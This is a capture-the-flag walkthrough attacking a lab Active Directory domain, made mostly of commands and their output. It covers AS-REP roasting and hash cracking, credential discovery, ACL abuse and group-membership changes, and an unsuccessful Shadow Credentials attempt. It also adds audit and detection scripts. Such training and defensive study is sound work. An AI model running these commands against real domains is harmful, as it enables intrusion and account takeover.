Target IP: 10.10.11.181

Key points

Information gathering

```
rustscan -a 10.10.11.181 -u 5000
The Modern Day Port Scanner.
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.181:53
Open 10.10.11.181:80
Open 10.10.11.181:88
Open 10.10.11.181:135
Open 10.10.11.181:139
Open 10.10.11.181:389
Open 10.10.11.181:445
Open 10.10.11.181:464
Open 10.10.11.181:593
Open 10.10.11.181:636
Open 10.10.11.181:3268
Open 10.10.11.181:3269
Open 10.10.11.181:9389
Open 10.10.11.181:5985
Open 10.10.11.181:47001
Open 10.10.11.181:49664
Open 10.10.11.181:49665
Open 10.10.11.181:49666
Open 10.10.11.181:49667
Open 10.10.11.181:49674
Open 10.10.11.181:49671
Open 10.10.11.181:49675
Open 10.10.11.181:49679
Open 10.10.11.181:49685
Open 10.10.11.181:49703
Open 10.10.11.181:49722
```

SMB service

```
smbclient -L //10.10.11.181
Password for [WORKGROUP\root]:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

Anonymous SMB gives nothing useful.

HTTP service

It is a static page, and directory scanning turns up nothing either, so download the six carousel images from the site and take a closer look at them.

```
for i in {1..6};do wget http://10.10.11.181/images/hero_$i.jpg;done
```

Inspect them with exiftool:

```
exiftool hero_1.jpg
ExifTool Version Number : 12.76
File Name : hero_1.jpg
Directory : .
File Size : 407 kB
File Modification Date/Time : 2022:06:08 03:45:20+08:00
File Access Date/Time : 2025:03:25 03:04:05+08:00
File Inode Change Date/Time : 2025:03:25 03:03:26+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
Exif Byte Order : Little-endian (Intel, II)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Artist : James Roberts
Y Cb Cr Positioning : Centered
Quality : 60%
XMP Toolkit : Image::ExifTool 11.88
Author : James Roberts
Creator Tool : Adobe Photoshop CC 2018 Macintosh
Derived From Document ID : 6413FD608B5C21D0939F910C0EFBBE44
Derived From Instance ID : 6413FD608B5C21D0939F910C0EFBBE44
Document ID : xmp.did:887A47FA048811EA8574B646AF4FC464
Instance ID : xmp.iid:887A47F9048811EA8574B646AF4FC464
DCT Encode Version : 100
APP14 Flags 0 : [14], Encoded with Blend=1 downsampling
APP14 Flags 1 : (none)
Color Transform : YCbCr
Image Width : 1900
Image Height : 1150
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:4:4 (1 1)
Image Size : 1900x1150
Megapixels : 2.2
```

Note that the Author field carries a person's name; save the name from every file into name.txt.

Normally both Author and Artist hold the name, but the second image turns out to have no Artist field, so Author is used instead.

```
exiftool *.jpg | grep Author | awk -F' ' '{print $3" "$4}' > name.txt
James Roberts
Michael Chaffrey
Donald Klay
Sarah Osvald
Jeffer Robinson
Nicole Smith
```

Use username-anarchy to generate a username wordlist from the names:

```
./username-anarchy -i name.txt > users.txt
```

AS-REP Roasting attack

```
impacket-GetNPUsers -usersfile users.txt -dc-ip 10.10.11.181 -format john absolute.htb/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

...[snip]...
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$d.klay@ABSOLUTE.HTB:18530e0c59304e8b5d667ac0cf0efa8a$ed41890599de622a5cf7808aef24c8272c03a5fb62a14b9de3f987e2f9ecc614fe22d44e7eba318ab44152271b84577844980b33e7b78ed0f9b36ebe43b4a6cc5339ecbef110e6325a4acb9d7661b4db47a609eccf7b13c53f9d1aa710a0220102bed90c8b8ee8c8319b9297d811d6c878cd9fca0e24646d82ac6c9d77b9aaf2b40ed8b9ef0c103166c3be1113daa285fca49a2dcba3dbae9d92cafeb6b7774bbd58982eaec5d712f744a281f2317b491555fcc7d58a8ed4c89d435a488b8e7df5c07d181007c5aeb3bd9c3dbb44bf896e9cdfc57509eeea3e7f76ff3d87a87cd7825e1f82e6f8724f9ba348
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...[snip]...
```

One hash comes back (d.klay has Kerberos pre-authentication disabled); save it to a file named hash and crack it with john:

```
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Darkmoonsky248girl ($krb5asrep$d.klay@ABSOLUTE.HTB)
1g 0:00:00:32 DONE (2025-03-25 03:27) 0.03097g/s 348137p/s 348137c/s 348137C/s DarrenCahppell..DarkAngelNinjaHaku
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

This yields a valid username and password:

```
username: d.klay
password: Darkmoonsky248girl
```

Revisiting SMB

Enumerate with netexec:

```
netexec winrm 10.10.11.181 -u d.klay -p Darkmoonsky248girl
WINRM 10.10.11.181 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:absolute.htb)
WINRM 10.10.11.181 5985 DC [-] absolute.htb\d.klay:Darkmoonsky248girl

netexec ldap 10.10.11.181 -u d.klay -p Darkmoonsky248girl
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [-] absolute.htb\d.klay:Darkmoonsky248girl

netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [-] absolute.htb\d.klay:Darkmoonsky248girl STATUS_ACCOUNT_RESTRICTION
```

All three fail, but note the STATUS_ACCOUNT_RESTRICTION error on the SMB login: with a correct password, that status means the account itself is restricted (here, NTLM logons for it are refused rather than the password being wrong). Try adding the -k flag so netexec authenticates with Kerberos instead:

```
netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
```

Retry the command that failed earlier:

```
netexec ldap 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
```

OK, that works.

List the SMB shares:

```
netexec smb 10.10.11.181 -u d.klay -p Darkmoonsky248girl -k --shares
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
SMB 10.10.11.181 445 DC [*] Enumerated shares
SMB 10.10.11.181 445 DC Share Permissions Remark
SMB 10.10.11.181 445 DC ----- ----------- ------
SMB 10.10.11.181 445 DC ADMIN$ Remote Admin
SMB 10.10.11.181 445 DC C$ Default share
SMB 10.10.11.181 445 DC IPC$ READ Remote IPC
SMB 10.10.11.181 445 DC NETLOGON READ Logon server share
SMB 10.10.11.181 445 DC Shared
SMB 10.10.11.181 445 DC SYSVOL READ Logon server share
```

There is a Shared share that looks interesting, but access to it requires Kerberos authentication (d.klay shows no permissions on it here), so another route is needed.

TGT "golden ticket" forging

Since the SMB service requires Kerberos authentication, try obtaining a ticket and using it to access SMB. (Strictly speaking nothing is forged here: getTGT asks the KDC for a legitimate TGT using d.klay's known password, which is exactly what an NTLM-restricted account needs.)

```
impacket-getTGT 'absolute.htb'/'d.klay':'Darkmoonsky248girl' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in d.klay.ccache
```

Import the ticket:

```
export KRB5CCNAME=d.klay.ccache
```

Sync the clock with the DC first (Kerberos rejects requests with too much clock skew):

```
ntpdate -s absolute.htb
```

Access SMB:

```
impacket-smbclient 'absolute.htb/d.klay:Darkmoonsky248girl@dc.absolute.htb' -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
#
```

SMB connects, but d.klay has no permission to read the interesting share, so enumerate users over LDAP instead:

```
netexec ldap 10.10.11.181 -u d.klay -p 'Darkmoonsky248girl' -k --users
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [+] absolute.htb\d.klay:Darkmoonsky248girl
LDAP 10.10.11.181 389 DC [*] Enumerated 17 domain users: absolute.htb
LDAP 10.10.11.181 389 DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.11.181 389 DC Administrator 2022-06-09 08:25:57 0 Built-in account for administering the computer/domain
LDAP 10.10.11.181 389 DC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.11.181 389 DC krbtgt 2022-06-09 08:16:38 0 Key Distribution Center Service Account
LDAP 10.10.11.181 389 DC J.Roberts 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC M.Chaffrey 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC D.Klay 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC s.osvald 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC j.robinson 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC n.smith 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC m.lovegod 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC l.moore 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC c.colt 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC s.johnson 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC d.lemm 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC svc_smb 2022-06-09 08:25:51 0 AbsoluteSMBService123!
LDAP 10.10.11.181 389 DC svc_audit 2022-06-09 08:25:51 0
LDAP 10.10.11.181 389 DC winrm_user 2022-06-09 08:25:51 2 Used to perform simple network tasks
```
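Two of the findings so far (d.klay being AS-REP roastable, and a password sitting in the description attribute of svc_smb) are things a domain admin can audit for from an LDAP export before anyone else does. The following is an added example written for this page, not code from the write-up or from any of the tools it uses; the user records are constructed, and the userAccountControl values in them are assumed.

```python
"""Audit an AD user export for the two weaknesses seen above: accounts with
Kerberos pre-authentication disabled (AS-REP roastable) and credentials left
in the description attribute. The sample records are constructed."""
import re

# userAccountControl bit flags as defined by Active Directory.
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Heuristics for a description that leaks a credential: an explicit keyword,
# or a token of 8+ chars mixing letters, digits and punctuation.
PASSWORD_WORDS = re.compile(r"pass(word)?|pwd|cred", re.IGNORECASE)
SECRET_TOKEN = re.compile(r"(?=\S*[A-Za-z])(?=\S*\d)(?=\S*[^\w\s])\S{8,}")


def is_asrep_roastable(uac: int) -> bool:
    """Enabled account whose KDC will hand out an AS-REP without pre-auth."""
    return bool(uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)


def description_leaks_secret(description: str) -> bool:
    return bool(PASSWORD_WORDS.search(description) or SECRET_TOKEN.search(description))


def audit(users):
    """Return (sAMAccountName, issue) pairs for every user that trips a check."""
    findings = []
    for u in users:
        if is_asrep_roastable(u["userAccountControl"]):
            findings.append((u["sAMAccountName"], "pre-auth disabled: AS-REP roastable"))
        if description_leaks_secret(u.get("description", "")):
            findings.append((u["sAMAccountName"], "description looks like a credential"))
    return findings


# Constructed sample modelled on the enumeration output above; UAC values are assumed.
SAMPLE_USERS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200,
     "description": "Built-in account for administering the computer/domain"},
    {"sAMAccountName": "Guest", "userAccountControl": 0x10202,
     "description": "Built-in account for guest access to the computer/domain"},
    {"sAMAccountName": "D.Klay", "userAccountControl": 0x410200, "description": ""},
    {"sAMAccountName": "svc_smb", "userAccountControl": 0x10200,
     "description": "AbsoluteSMBService123!"},
    {"sAMAccountName": "winrm_user", "userAccountControl": 0x10200,
     "description": "Used to perform simple network tasks"},
]

if __name__ == "__main__":
    for account, issue in audit(SAMPLE_USERS):
        print(f"{account}: {issue}")
```

Against a real domain the same checks run over an `ldapsearch` or PowerShell export of `sAMAccountName,userAccountControl,description`; the disabled Guest account is deliberately excluded so the report only lists accounts that can actually be roasted.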

Another username and password turns up, left in the description field of svc_smb:

```
username: svc_smb
password: AbsoluteSMBService123!
```

Verify with nxc:

```
nxc smb 10.10.11.181 -u svc_smb -p 'AbsoluteSMBService123!'
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [-] absolute.htb\svc_smb:AbsoluteSMBService123! STATUS_ACCOUNT_RESTRICTION
```

As before, a plain (NTLM) logon is refused, so go through the ticket route again:

```
impacket-getTGT 'absolute.htb'/'svc_smb':'AbsoluteSMBService123!' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in svc_smb.ccache
```

Import the ticket:

```
export KRB5CCNAME=svc_smb.ccache
```

Access SMB:

```
impacket-smbclient 'absolute.htb'/'svc_smb':'AbsoluteSMBService123!'@'dc.absolute.htb' -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
#
```

Access works; go straight to the Shared share found earlier:

```
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
# use shared
# ls
drw-rw-rw- 0 Fri Sep 2 01:02:23 2022 .
drw-rw-rw- 0 Fri Sep 2 01:02:23 2022 ..
-rw-rw-rw- 72 Fri Sep 2 01:02:23 2022 compiler.sh
-rw-rw-rw- 67584 Fri Sep 2 01:02:23 2022 test.exe
# get compiler.sh
# get test.exe
#
```

Two files; download them and examine them locally.

The puzzling exe

```
cat compiler.sh
#!/bin/bash

nim c -d:mingw --app:gui --cc:gcc -d:danger -d:strip $1
```

The .sh file holds nothing useful beyond showing how the binary was compiled (a Nim program built as a stripped Windows GUI app), so the exe is the thing to focus on.

[image: disassembly of test.exe]

From the disassembly (with some help from GPT) it looks like a program that talks to some kind of service, so run it on Windows and capture its traffic with Wireshark.

Note: DNS must be configured on the Windows host (pointing at the DC) or nothing gets captured, because the program never gets past name resolution.

[image: Windows network adapter DNS settings]

Listen on that interface with Wireshark and run the program.

[image: Wireshark capture of the program's traffic]

This is all of the captured traffic; one packet shows absolute.htb\mlovegod, so follow that TCP stream.

[image: followed TCP stream showing the credentials]

A new pair of credentials appears; matching the name against the usernames enumerated earlier via LDAP gives:

```
username: m.lovegod
password: AbsoluteLDAP2022!
```

Verify it.

Same familiar ticket request:

```
impacket-getTGT 'absolute.htb'/'m.lovegod':'AbsoluteLDAP2022!' -dc-ip 10.10.11.181
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in m.lovegod.ccache
```

Import the ticket (remember to sync the clock):

```
export KRB5CCNAME=m.lovegod.ccache
```

Verify with nxc:

```
nxc smb 10.10.11.181 -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.181 445 DC [+] absolute.htb\m.lovegod:AbsoluteLDAP2022!

nxc ldap 10.10.11.181 -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k
SMB 10.10.11.181 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.181 389 DC [+] absolute.htb\m.lovegod:AbsoluteLDAP2022!
```

Still no interactive login (m.lovegod cannot WinRM in), so collect domain data with BloodHound.

BloodHound collection

```
bloodhound-python -ns 10.10.11.181 --dns-tcp -d absolute.htb -u m.lovegod -p AbsoluteLDAP2022! -k -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: absolute.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.absolute.htb
INFO: Found 18 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.absolute.htb
INFO: Done in 00M 10S
INFO: Compressing output into 20250326005117_bloodhound.zip
```

Open the data in BloodHound.

Starting from the m.lovegod user and clicking Transitive Object Control gives the following:

[image: BloodHound Transitive Object Control from m.lovegod]

m.lovegod owns the Network Audit group but is not a member of it; the group has GenericWrite over the winrm_user user, and winrm_user is in the Remote Management Users group, so winrm_user can log in remotely over WinRM.

[image: group memberships of m.lovegod]

But m.lovegod belongs to the three groups shown in the picture and not to Network Audit.

So the path is: as owner, first add m.lovegod to the Network Audit group, then use the group's GenericWrite over winrm_user to run a Shadow Credentials attack against that account.

Taking winrm_user?

References:

https://www.thehacker.recipes/ad/movement/dacl/grant-ownership

https://www.thehacker.recipes/ad/movement/dacl/grant-rights

Sync the clock first:

```
ntpdate -s absolute.htb
```

Set m.lovegod as the owner of the Network Audit group (the write-up does this explicitly, although BloodHound already reports m.lovegod as its owner):

```
impacket-owneredit -k -no-pass absolute.htb/m.lovegod -dc-ip dc.absolute.htb -new-owner m.lovegod -target 'Network Audit' -action write
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-4078382237-1492182817-2568127209-1109
[*] - sAMAccountName: m.lovegod
[*] - distinguishedName: CN=m.lovegod,CN=Users,DC=absolute,DC=htb
[*] OwnerSid modified successfully!
```

As owner, grant m.lovegod full control over Network Audit by writing its DACL:

```
impacket-dacledit -k 'absolute.htb/m.lovegod:AbsoluteLDAP2022!' -dc-ip dc.absolute.htb -principal m.lovegod -target "Network Audit" -action write -rights FullControl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250326-034031.bak
[*] DACL modified successfully!
```

Add m.lovegod to the Network Audit group:

```
bloodyAD --host dc.absolute.htb --dc-ip 10.10.11.181 -d 'absolute.htb' -u 'm.lovegod' -p 'AbsoluteLDAP2022!' -k add groupMember "Network Audit" "m.lovegod"
[+] m.lovegod added to Network Audit
```

Membership added. Request a fresh TGT, since the existing ticket was issued before the group change and does not carry the new membership:

```
impacket-getTGT 'absolute.htb'/'m.lovegod':'AbsoluteLDAP2022!' -dc-ip 10.10.11.181

export KRB5CCNAME=m.lovegod.ccache
```

Run the Shadow Credentials attack against winrm_user:

```
certipy-ad shadow auto -k -username m.lovegod@absolute.htb -p 'AbsoluteLDAP2022!' -account winrm_user -target dc.absolute.htb -dc-ip 10.10.11.181
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'winrm_user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '22e415af-e00b-59e5-9462-693c3948067e'
[*] Adding Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user'
[*] Successfully added Key Credential with device ID '22e415af-e00b-59e5-9462-693c3948067e' to the Key Credentials for 'winrm_user'
[*] Authenticating as 'winrm_user' with the certificate
[*] Using principal: winrm_user@absolute.htb
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[*] Restoring the old Key Credentials for 'winrm_user'
[*] Successfully restored the old Key Credentials for 'winrm_user'
[*] NT hash for 'winrm_user': None
```
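Every step of the chain just run (owner change, DACL rewrite, group membership add, msDS-KeyCredentialLink write) lands in the Windows Security log as event 5136 (directory service object modified, given SACL auditing on the objects) or 4728 (member added to a security-enabled global group). The block below is an added detection example written for this page, not part of the write-up; the event lines are a constructed, simplified rendering of those events, not real log output, and the one-hour window is an assumed tuning value.

```python
"""Correlate the object-control chain above from Windows Security events:
one subject changing a security descriptor or key credential on one object
and then adding a member to / writing a key credential on another, inside a
short window. Event lines are constructed and simplified."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: timestamp|event id|subject|target DN|attribute changed.
SAMPLE_EVENTS = """\
2025-03-26T03:38:10|5136|m.lovegod|CN=Network Audit,CN=Users,DC=absolute,DC=htb|nTSecurityDescriptor
2025-03-26T03:40:31|5136|m.lovegod|CN=Network Audit,CN=Users,DC=absolute,DC=htb|nTSecurityDescriptor
2025-03-26T03:41:05|4728|m.lovegod|CN=Network Audit,CN=Users,DC=absolute,DC=htb|member
2025-03-26T03:45:12|5136|m.lovegod|CN=winrm_user,CN=Users,DC=absolute,DC=htb|msDS-KeyCredentialLink
2025-03-26T09:12:00|5136|svc_audit|CN=l.moore,CN=Users,DC=absolute,DC=htb|description
"""

# Attribute writes that hand control of the object to the writer.
CONTROL_ATTRS = {"nTSecurityDescriptor", "msDS-KeyCredentialLink"}
MEMBER_ADDED = 4728


def parse_events(text):
    """Parse the constructed format into (time, event_id, subject, target, attr)."""
    events = []
    for line in text.strip().splitlines():
        ts, event_id, subject, target, attr = line.split("|")
        events.append((datetime.fromisoformat(ts), int(event_id), subject, target, attr))
    return events


def find_control_chains(events, window=timedelta(hours=1)):
    """Map subject -> sorted target DNs for subjects that performed two or more
    control-granting changes on two or more objects within `window`."""
    by_subject = defaultdict(list)
    for ev in events:
        by_subject[ev[2]].append(ev)
    chains = {}
    for subject, evs in by_subject.items():
        control = sorted(e for e in evs if e[4] in CONTROL_ATTRS or e[1] == MEMBER_ADDED)
        targets = {e[3] for e in control}
        if len(control) >= 2 and len(targets) >= 2 and control[-1][0] - control[0][0] <= window:
            chains[subject] = sorted(targets)
    return chains


if __name__ == "__main__":
    for subject, targets in find_control_chains(parse_events(SAMPLE_EVENTS)).items():
        print(f"{subject} took control of: {', '.join(targets)}")
```

The lone description change by svc_audit is deliberately left out of the result: a single attribute write is routine administration, whereas the same account rewriting a group's DACL and then a user's key credential minutes apart is the shape worth alerting on.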

No surprise, there is a surprise: the request for winrm_user's TGT fails.

Look at the error: the familiar KDC_ERR_PADATA_TYPE_NOSUPP, meaning the KDC rejects the PKINIT pre-authentication data. The guess is that the DC's PKINIT certificate has expired, so the Shadow Credentials attack cannot be completed this way.

To be updated

I tried quite a few approaches and they all failed, so this stops here for now...